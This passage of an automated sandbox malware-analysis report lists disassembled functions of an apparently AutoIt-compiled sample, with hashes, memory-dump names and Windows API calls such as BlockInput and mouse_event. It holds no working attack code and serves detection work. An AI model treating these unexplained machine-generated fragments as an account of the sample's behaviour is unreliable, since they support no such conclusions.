Instruction Fuzzy Hash: 7BE04F32015611AFF7352B21FC04E737BADEB04710F10891DF6A6804B4DB62ACA0DB10

Uniqueness

Uniqueness Score: -1.00%

Function 012BCAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 01300C40

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: a1f3c491d29edd35fb974e15fbf2aed8b2b7b33ea647a762fd9d6e3b1cfaab67
Instruction ID: 1e39fef44b572e349c24996da8a84ad0f2a68f7749a19df0ce1d264258481128
Opcode Fuzzy Hash: a1f3c491d29edd35fb974e15fbf2aed8b2b7b33ea647a762fd9d6e3b1cfaab67
Instruction Fuzzy Hash: B132AD7492020ADFDF19DF98C8D0BFDBBB4BF15388F14405AE906AB291D771AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012E676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,012E6766,?,?,00000008,?,?,012EFEFE,00000000), ref: 012E6998

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 5f08cda4aa3469c0a30f43e6f4e10531e36438fada06ea8f8fa3d45b77ba300d
Instruction ID: 77290e04165352c5342a495bdcaddce847ee55041ab46693ff316a06bdc6ca43
Opcode Fuzzy Hash: 5f08cda4aa3469c0a30f43e6f4e10531e36438fada06ea8f8fa3d45b77ba300d
Instruction Fuzzy Hash: 69B16B715206098FE719CF2CC48ABA47FE0FF15364F658658EA99CF2A2C335E985CB40

Uniqueness

Uniqueness Score: -1.00%

Function 012CB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0130851F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 17f78bb9b1a667283c56f4f3e4fbd4206d830b8721894ee5927a7ac35929eb95
Instruction ID: 8715ab96e9d34a4d2bc42ba0b3ad47125cca600cadc3b7f8b4296fe4196c096d
Opcode Fuzzy Hash: 17f78bb9b1a667283c56f4f3e4fbd4206d830b8721894ee5927a7ac35929eb95
Instruction Fuzzy Hash: 28128C75D102299BDB25CF58C8916EEB7F5FF48710F1081AAE909EB291E7709A81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0132EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32 ref: 0132EABD

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: c205ca9434264891948ae5d56fc9535053dd4098bce671835f412985f636652e
Instruction ID: e791b6beca3f6123a3fb0c727723ddc8eb7171f23e3e729ddeb6e766ca82b529
Opcode Fuzzy Hash: c205ca9434264891948ae5d56fc9535053dd4098bce671835f412985f636652e
Instruction Fuzzy Hash: 8CE04F352202159FD710EF69D444E9AF7ECAFA87B4F00842AFC4AC7350DA70F8408B91

Uniqueness

Uniqueness Score: -1.00%

Function 0131E355 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0131E37E

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 8f402b00ac683ec336154f8f175845a0450ebf88e18e4bc5f34fa0f5970bb9ae
Instruction ID: 66a7a8f5576a907bdafa94028b0a853b0fce28af81b5da080ac065d708af6ad8
Opcode Fuzzy Hash: 8f402b00ac683ec336154f8f175845a0450ebf88e18e4bc5f34fa0f5970bb9ae
Instruction Fuzzy Hash: 89D05BB69502017DF67F093C893FF76390CE301648F409F69B9018598DD583A5047811

Uniqueness

Uniqueness Score: -1.00%

Function 012D781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 012D798B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 6e243fdbf09f8e7d36548a3602620f777769b5cd1d197614683e95260592b048
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: CA5179726307875BEF38857CC8577FE7B999B1220CF08051ACB86D7282C65DEA05E356

Uniqueness

Uniqueness Score: -1.00%

Function 012E6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4200af6abcdca8f2146f8c19afe1ae80e9fb7bc374d826c55e7f65f56c71d19c
Instruction ID: 456c27414004ab1f6f7b69a02ee2d9b6bd3adba2302d1dc46394d92951148d83
Opcode Fuzzy Hash: 4200af6abcdca8f2146f8c19afe1ae80e9fb7bc374d826c55e7f65f56c71d19c
Instruction Fuzzy Hash: 79325622D39F424DD7239538D826336B68DAFB77C5F55D337E81AB599AEB28C0834240

Uniqueness

Uniqueness Score: -1.00%

Function 012CCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3051ea67f05773e8613cd929018b4e34bf4d56fd7e3ed5c66a104c4c13c44f3c
Instruction ID: 50c6cf236f5bf7901d903e06d3683cb9667f109568bce5a1ef6d96f4718d5d1d
Opcode Fuzzy Hash: 3051ea67f05773e8613cd929018b4e34bf4d56fd7e3ed5c66a104c4c13c44f3c
Instruction Fuzzy Hash: F6323931A1050A8FEF36CE2CC4B467D7BE5EB45318F1893AADA46DB6D2D230D981DB41

Uniqueness

Uniqueness Score: -1.00%

Function 012B7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e31681abf707b93c40d9c697892d2b60ab056fcb4f89aec58d2d59aec94ab0a
Instruction ID: b46dc3bf8cc6ce33e2841250620feedb369b02e5bcf8d8eb771105b600e5f6e8
Opcode Fuzzy Hash: 7e31681abf707b93c40d9c697892d2b60ab056fcb4f89aec58d2d59aec94ab0a
Instruction Fuzzy Hash: C0229070A2020ADFDF14CF68D981AEEF7F5FF54340F144629EA16A7291EB35A910CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012B91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e2dd058f10850b699cc54cb88e68e37dba1d71bc36b1ee783b89ea8202e9649
Instruction ID: dcf99fd6fccbe9d440f1019e54130ac51005e978844179d546d6418a44962c20
Opcode Fuzzy Hash: 1e2dd058f10850b699cc54cb88e68e37dba1d71bc36b1ee783b89ea8202e9649
Instruction Fuzzy Hash: 9C0217B0E2020AEBDF15DF54D881AADB7B5FF54344F128169EA169B390EB31A950CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012D19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 8ddf62287097106b3eb002c0fadc0318c89ad25d623e3b43551d36ed9dc2223c
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 5691337222D0E34AEB2E467EC57507DFFE15A821A130A079DD5F2CA9C5FD249174D720

Uniqueness

Uniqueness Score: -1.00%

Function 012D7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bff3f27da1986c3b093c27dc0984c80a5fb846be3fc2943ecc33541aa108867
Instruction ID: 4703c40610f17a5980db463d0c510424e5918272df7a31ccac436c13829d8fea
Opcode Fuzzy Hash: 4bff3f27da1986c3b093c27dc0984c80a5fb846be3fc2943ecc33541aa108867
Instruction Fuzzy Hash: 8B61687123070B5AEE349A6CCC95BBE7794EF5170CF10091AEB82DB281F65D9A42C356

Uniqueness

Uniqueness Score: -1.00%

Function 012D1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 4537ff92f200d9021da97c18112f5eb94d13f2d47e3d94c0c67455adc91d7492
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 8481757262D0A349FB6E827EC53547EFFE15A821A130A079DD5F2CB9D2EE24C174D620

Uniqueness

Uniqueness Score: -1.00%

Function 012CD065 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ad9de3814c1cf40dd2de05001bd50055468fac7829c5b5effb54ba844ce9ba
Instruction ID: 2d2da710d8aa9e6bb841fef54dfabe5d15216f3f9a9f5c7b5eba4c2487df99ac
Opcode Fuzzy Hash: 60ad9de3814c1cf40dd2de05001bd50055468fac7829c5b5effb54ba844ce9ba
Instruction Fuzzy Hash: 2B61457590B7828FD3638F78C845141BB70AF6726832A49EEC4804F0A3C7751D1ACFA5

Uniqueness

Uniqueness Score: -1.00%

Function 012C120B Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f1400a37424b646199717ff0de7e97edc4db7b166bc8f8d3060f7f868ed5f20
Instruction ID: 25ed2ec3af1389c8c74f3690b5533abad0090d9d8fdf150e5ace5a4875462be9
Opcode Fuzzy Hash: 0f1400a37424b646199717ff0de7e97edc4db7b166bc8f8d3060f7f868ed5f20
Instruction Fuzzy Hash: DF41057255F7C48BC7638B78D0651A27FB1AF1323872A48DEC4C0CE823D226594BDB52

Uniqueness

Uniqueness Score: -1.00%

Function 001D36B0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.347993788.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 92544a2c673ecd498140e57d8c14beda71c29b7d4b2a2d2a93bbd81110eb861e
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 0641B5B1D1051CDBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01322046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e872a9dfa94e8beab490cfba5356beba3df552007fae26629f4d8b60f9ae1af4
Instruction ID: 51a5d84a855166f647ae6c3765cbe0ec95520a8801587d0a2a4dd7722c63c7e0
Opcode Fuzzy Hash: e872a9dfa94e8beab490cfba5356beba3df552007fae26629f4d8b60f9ae1af4
Instruction Fuzzy Hash: 3E21BB326206118BD728CF79C81267F73D9A754324F15862EE4A7C77C1DE79A904C740

Uniqueness

Uniqueness Score: -1.00%

Function 001D35A0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.347993788.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: df1a7a3e9453bf63fcad744caaa8899065dc83050fdbe0fd0aa97cab84f0ed79
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 3A019278A04109EFCB48DF98D5909AEF7B5FB48310F20869AE819A7301D731AE41DB81

Uniqueness

Uniqueness Score: -1.00%

Function 001D3540 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.347993788.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 2b9bbaed3f363709bc04281daf10a369c4dc6d275e8d7a35db87e32e801ea114
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 2E019278A01109EFCB48DF98D5909AEF7B5FB48310F60859AE919A7301D730AE41DB81

Uniqueness

Uniqueness Score: -1.00%

Function 001D1ED0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.347993788.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_fredchungel99962.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Uniqueness

Uniqueness Score: -1.00%

Function 01332ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 01332B30
DeleteObject.GDI32(00000000), ref: 01332B43
DestroyWindow.USER32 ref: 01332B52
GetDesktopWindow.USER32 ref: 01332B6D
GetWindowRect.USER32(00000000), ref: 01332B74
SetRect.USER32 ref: 01332CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 01332CB1
CreateWindowExW.USER32 ref: 01332CF8
GetClientRect.USER32 ref: 01332D04
CreateWindowExW.USER32 ref: 01332D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 01332D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01332D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01332D80
GlobalLock.KERNEL32 ref: 01332D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 01332D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01332DA1
CloseHandle.KERNEL32(00000000), ref: 01332DA8
GlobalFree.KERNEL32(00000000), ref: 01332DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 01332DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0134FC38,00000000), ref: 01332DDB
GlobalFree.KERNEL32(00000000), ref: 01332DEB
CopyImage.USER32 ref: 01332E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 01332E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 01332E52
ShowWindow.USER32(00000004), ref: 0133303F

Strings

, xrefs: 01332FC5
AutoIt v3, xrefs: 01332CF2
DISPLAY, xrefs: 01332EA2
static, xrefs: 01332D3A, 01332E91

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: e1a614bc932c4bc0dcf5bc5e3bdb9d47730cdd85b15579877dc5cfb48c9276d2
Instruction ID: a2dd1261bf81d826855a8624f7785b2e492ecc7512950858270cd4d1d2457583
Opcode Fuzzy Hash: e1a614bc932c4bc0dcf5bc5e3bdb9d47730cdd85b15579877dc5cfb48c9276d2
Instruction Fuzzy Hash: 6E026C75A00205AFDB24DFA4D888EAE7BBDFF48714F048158F915AB294CB74ED01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 013470D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0134712F
GetSysColorBrush.USER32 ref: 01347160
GetSysColor.USER32 ref: 0134716C
SetBkColor.GDI32(?,000000FF), ref: 01347186
SelectObject.GDI32(?,?), ref: 01347195
InflateRect.USER32 ref: 013471C0
GetSysColor.USER32 ref: 013471C8
CreateSolidBrush.GDI32(00000000), ref: 013471CF
FrameRect.USER32 ref: 013471DE
DeleteObject.GDI32(00000000), ref: 013471E5
InflateRect.USER32 ref: 01347230
FillRect.USER32 ref: 01347262
GetWindowLongW.USER32(?,000000F0), ref: 01347284

Part of subcall function 013473E8: GetSysColor.USER32 ref: 01347421
Part of subcall function 013473E8: SetTextColor.GDI32(?,?), ref: 01347425
